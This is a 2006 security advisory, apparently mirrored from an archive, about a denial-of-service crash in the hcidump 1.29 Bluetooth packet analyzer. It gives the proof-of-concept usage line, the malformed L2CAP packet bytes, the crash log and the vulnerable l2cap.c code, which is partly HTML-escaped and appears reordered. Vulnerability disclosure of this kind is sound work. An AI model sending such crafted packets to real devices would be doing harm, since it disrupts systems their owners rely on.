[ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC

2006-02-07T00:00:00
ID SECURITYVULNS:DOC:11322
Type securityvulns
Reporter Securityvulns
Modified 2006-02-07T00:00:00

Description

[Software affected] hcidump

[Version] 1.29 (may be other)

[Impact] Denial of Service (may be more)

[Credits] Pierre Betouin - pierre.betouin@infratech.fr - Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher)

BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] was notified

[Original advisory]

http://www.secuobs.com/news/05022006-bluetooth9.shtml#english http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] download it on http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

./hcidump-crash 00:80:09:XX:XX:XX

L2CAP packet sent (15) Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

hcidump

HCI sniffer - Bluetooth packet analyzer ver 1.29 device: hci0 snap_len: 1028 filter: 0xffffffff < HCI Command: Create Connection (0x01|0x0005) plen 13

> HCI Event: Command Status (0x0f) plen 4 > HCI Event: Connect Complete (0x03) plen 11

< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4 < ACL data: handle 41 flags 0x02 dlen 19 L2CAP(s): debug : code=8 Echo req: dlen 12 L2CAP(s): debug : code=0 code 0x00 ident 0 len 0 (...) L2CAP(s): debug : code=0 code 0x00 ident 0 len 0 segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) { if (!p_filter(FILT_L2CAP)) { p_indent(level, frm); printf("L2CAP(s): "); }

switch &#40;hdr-&gt;code&#41; {
l2cap_cmd_hdr *hdr = frm-&gt;ptr;
frm-&gt;ptr += L2CAP_CMD_HDR_SIZE;
frm-&gt;len -= L2CAP_CMD_HDR_SIZE;
&#40;...&#41;
default:
    if &#40;p_filter&#40;FILT_L2CAP&#41;&#41;
        break;
    printf&#40;&quot;code 0x&#37;2.2x ident &#37;d len &#37;d&#92;n&quot;,
        hdr-&gt;code, hdr-&gt;ident, btohs&#40;hdr-&gt;len&#41;&#41;;
        raw_dump&#40;level, frm&#41;;
}
frm-&gt;ptr += btohs&#40;hdr-&gt;len&#41;;
frm-&gt;len -= btohs&#40;hdr-&gt;len&#41;;